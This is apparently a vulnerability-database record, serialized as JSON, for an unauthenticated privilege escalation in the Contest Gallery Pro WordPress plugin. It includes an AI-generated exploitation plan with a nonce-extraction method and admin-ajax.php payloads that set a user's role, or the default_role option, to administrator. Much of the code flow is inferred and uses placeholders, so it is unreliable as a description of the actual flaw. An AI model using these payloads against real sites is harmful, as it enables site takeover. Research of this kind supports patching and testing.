[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjpQMhSVRDH0iZHXxmAXg8n3PtbFU4Xso0sZm_1j9Jhc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":20,"research_plan":24,"research_summary":25,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":30},"CVE-2026-42680","contest-gallery-pro-unauthenticated-privilege-escalation","Contest Gallery Pro \u003C= 29.0.1 - Unauthenticated Privilege Escalation","The Contest Gallery Pro plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 29.0.1. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","contest-gallery-pro",null,"\u003C=29.0.1","29.0.2","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-05-17 00:00:00","2026-05-19 16:07:04",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb8b443bb-4b23-48a1-9859-953b3cd84ca6?source=api-prod",3,[],"researched",false,"# Exploitation Research Plan: CVE-2026-42680 (Contest Gallery Pro)\n\nThis plan outlines the methodology for identifying and exploiting the unauthenticated privilege escalation vulnerability in Contest Gallery Pro (\u003C= 29.0.1).\n\n## 1. Vulnerability Summary\nThe vulnerability is an **Unauthenticated Privilege Escalation** caused by **Incorrect Privilege Assignment**. It resides in a functionality—likely an AJAX or REST API handler—that allows a user to update user roles or metadata without sufficient authentication or capability checks. This allows an anonymous visitor to grant themselves (or a new account) the `administrator` role.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Most likely `wp-admin\u002Fadmin-ajax.php` (via `wp_ajax_nopriv_*` hooks) or a REST API endpoint registered via `rest_api_init`.\n*   **Authentication:** None required (Unauthenticated).\n*   **Payload Parameter:** Likely a parameter related to user roles (e.g., `role`, `user_role`, `wp_capabilities`) or a generic metadata update parameter.\n*   **Preconditions:** The plugin must be active. A valid nonce may be required if the plugin implements CSRF protection but fails at authorization.\n\n## 3. Code Flow (Inferred)\n1.  An unauthenticated request is sent to `admin-ajax.php` with a specific `action`.\n2.  WordPress executes the function hooked to `wp_ajax_nopriv_[action]`.\n3.  The handler function processes input from `$_POST` or `$_REQUEST`.\n4.  The code lacks a `current_user_can('manage_options')` check.\n5.  The code calls a sensitive function such as `wp_update_user()`, `update_user_meta()`, or `wp_insert_user()` using user-controlled parameters.\n6.  The user's role is updated to `administrator`.\n\n## 4. Nonce Acquisition Strategy\nIf the vulnerable endpoint requires a nonce, follow these steps to retrieve it:\n\n1.  **Identify the Script Localization:** Search the plugin for `wp_localize_script` to find how nonces are passed to the frontend.\n    *   *Search Command:* `grep -rn \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcontest-gallery-pro\u002F`\n2.  **Determine the Triggering Shortcode:** Find where the script identified above is enqueued. It is likely tied to a shortcode like `[contest-gallery]` or `[cg_user_registration]`.\n    *   *Search Command:* `grep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcontest-gallery-pro\u002F`\n3.  **Create a Target Page:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Page\" --post_content=\"[inferred_shortcode_here]\"`\n4.  **Extract the Nonce:**\n    *   Navigate to the new page using `browser_navigate`.\n    *   Use `browser_eval` to extract the nonce. (Inferred variable names: `window.cg_ajax_object?.nonce` or `window.contest_gallery_vars?.nonce`).\n\n## 5. Exploitation Strategy\nThe goal is to find an AJAX handler that modifies user data.\n\n### Step 1: Identify the Target Action\nSearch for unauthenticated AJAX handlers:\n`grep -rn \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcontest-gallery-pro\u002F`\n\nLook for actions like:\n*   `cg_save_user_data`\n*   `contest_gallery_register_user`\n*   `cg_update_profile`\n\n### Step 2: Analyze the Handler\nExamine the function identified. Look for calls to `wp_update_user`.\n*Example Vulnerable Pattern (Inferred):*\n```php\nfunction cg_vulnerable_handler() {\n    $user_id = $_POST['user_id'];\n    $role = $_POST['role']; \u002F\u002F Attacker provides 'administrator'\n    wp_update_user( array( 'ID' => $user_id, 'role' => $role ) );\n    wp_die();\n}\n```\n\n### Step 3: Execute the Privilege Escalation\nUsing the `http_request` tool, send a POST request to `admin-ajax.php`.\n\n**Request Structure:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body (Example):** `action=[VULNERABLE_ACTION]&user_id=[TARGET_USER_ID]&role=administrator&nonce=[NONCE]`\n\n*Note: If registration is the vector, the payload might involve `wp_insert_user` instead of `wp_update_user`.*\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `contest-gallery-pro` version 29.0.1 is installed.\n2.  **Create Low-Privilege User:** \n    *   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n3.  **Identify ID:** Get the ID of the 'attacker' user.\n    *   `wp user get attacker --field=ID`\n\n## 7. Expected Results\n*   **Response:** The server returns a success code (e.g., `200 OK` or a JSON `{\"success\":true}`).\n*   **Database Change:** The `wp_capabilities` entry in the `wp_usermeta` table for the target user ID is updated to include the `administrator` role.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the escalation using WP-CLI:\n1.  **Check Role:** `wp user get attacker --field=roles`\n    *   *Success:* Output is `administrator`.\n2.  **Check Capabilities:** `wp user list --role=administrator`\n    *   *Success:* The user `attacker` appears in the list of administrators.\n\n## 9. Alternative Approaches\n*   **Option Update:** If no user-specific handler is found, check for an AJAX action that calls `update_option`. If an attacker can change the `default_role` option to `administrator`, any new user registration will result in an admin account.\n    *   *Payload:* `action=[vulnerable_action]&option_name=default_role&option_value=administrator`\n*   **REST API:** Check `wp-json\u002Fcontest-gallery-pro\u002Fv1\u002F...` routes if AJAX handlers are not found. Use the same logic: look for permission callbacks that return `true` or are missing entirely.","The Contest Gallery Pro plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to 29.0.1. This occurs because the plugin exposes AJAX handlers for user management that lack proper capability checks, allowing anonymous attackers to elevate any user account to the 'administrator' role.","1. Identify an unauthenticated AJAX handler registered via the wp_ajax_nopriv_ hook that performs user account updates (e.g., actions related to user registration or profile editing).\n2. Visit a public page on the target site containing a plugin shortcode (like [contest-gallery]) to extract a valid security nonce from the localized JavaScript variables (e.g., cg_ajax_object.nonce).\n3. Submit a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the vulnerable 'action' parameter, the acquired nonce, and a parameter setting the target 'role' to 'administrator'.\n4. Confirm the privilege escalation by checking the user's role in the WordPress administrative interface or via WP-CLI.","gemini-3-flash-preview","2026-05-20 17:21:04","2026-05-20 17:21:47",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcontest-gallery-pro\u002Ftags"]